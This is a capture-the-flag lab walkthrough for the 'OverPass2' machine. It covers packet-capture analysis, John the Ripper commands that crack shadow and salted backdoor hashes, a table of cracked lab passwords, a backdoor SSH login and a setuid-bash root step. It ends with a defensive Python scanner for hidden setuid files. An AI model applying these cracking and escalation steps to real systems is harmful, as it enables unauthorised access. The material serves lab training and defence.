OverPass2

Target Details

  • IP: 10.10.145.49

Analyze pcap file

  • Download pcap file

  • Open it with Wireshark

    sudo wireshark

  • Follow the TCP streams; you'll find all the answers to the questions there

Crack Hashes from the Wireshark packets

  • Download fasttrack wordlist

  • While analyzing the packets, dump the users from the shadow file into the shadow_dump.txt file

  • Crack the user shadow file passwords using John

    john -w=/usr/share/wordlists/fasttrack.txt shadow_dump.txt

    The user hashes are stored in the shadow_dump.txt file.

    Username    Password
    bee         secret12
    szymex      abcd123
    muirland    1qaz2wsx
    paradox     secuirty3

  • Get the hash from the packet file and the hard-coded salt from the ssh-backdoor GitHub repo

  • Store them in the hash.txt file in hash:salt format

  • Crack using John

    john -w=/usr/share/wordlists/rockyou.txt hash.txt

    Username    Password
    james       november16

Hack Again

  • Log in over the backdoor SSH, since we already know the password

  • Get the user flag

  • Listing hidden files reveals .suid_bash, which can be run as root

  • We've rooted the machine

  • Get root flag
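
From the defender's side, the hidden .suid_bash file found above is the kind of artifact a setuid sweep should catch. The following is an added example, not part of the original writeup: the function names, the allowlist of expected directories and the sample tree built in demo() are assumptions made for illustration.

```python
import os
import stat
import tempfile

# Assumed allowlist of directories where packaged setuid binaries normally live.
EXPECTED_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/lib", "/usr/libexec")

def find_suspicious_setid(root, expected_dirs=EXPECTED_DIRS):
    """Report setuid/setgid regular files under root that are hidden or
    sit outside the expected system directories."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        real_dir = os.path.realpath(dirpath)
        expected = any(real_dir == d or real_dir.startswith(d + os.sep)
                       for d in expected_dirs)
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: inspect the entry itself, not a symlink target
            except OSError:
                continue  # file vanished or is unreadable
            bits = st.st_mode & (stat.S_ISUID | stat.S_ISGID)
            if not stat.S_ISREG(st.st_mode) or not bits:
                continue
            rel_parts = os.path.relpath(path, root).split(os.sep)
            reasons = []
            if any(p.startswith(".") for p in rel_parts):
                reasons.append("hidden")
            if not expected:
                reasons.append("outside-expected-dirs")
            if reasons:
                findings.append({"path": path, "uid": st.st_uid,
                                 "mode": oct(stat.S_IMODE(st.st_mode)),
                                 "reasons": reasons})
    return findings

def demo():
    """Scan a constructed tree: one hidden setuid file next to ordinary files."""
    with tempfile.TemporaryDirectory() as root:
        home = os.path.join(root, "home", "james")
        os.makedirs(home)
        for name, mode in ((".suid_bash", 0o4755), (".bashrc", 0o644), ("notes.txt", 0o644)):
            path = os.path.join(home, name)
            with open(path, "wb") as fh:
                fh.write(b"constructed sample\n")
            os.chmod(path, mode)
        return [(os.path.relpath(f["path"], root), f["mode"], f["reasons"])
                for f in find_suspicious_setid(root)]
```

On a real host, run find_suspicious_setid("/") as root and compare the findings against a known-good baseline for that image.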
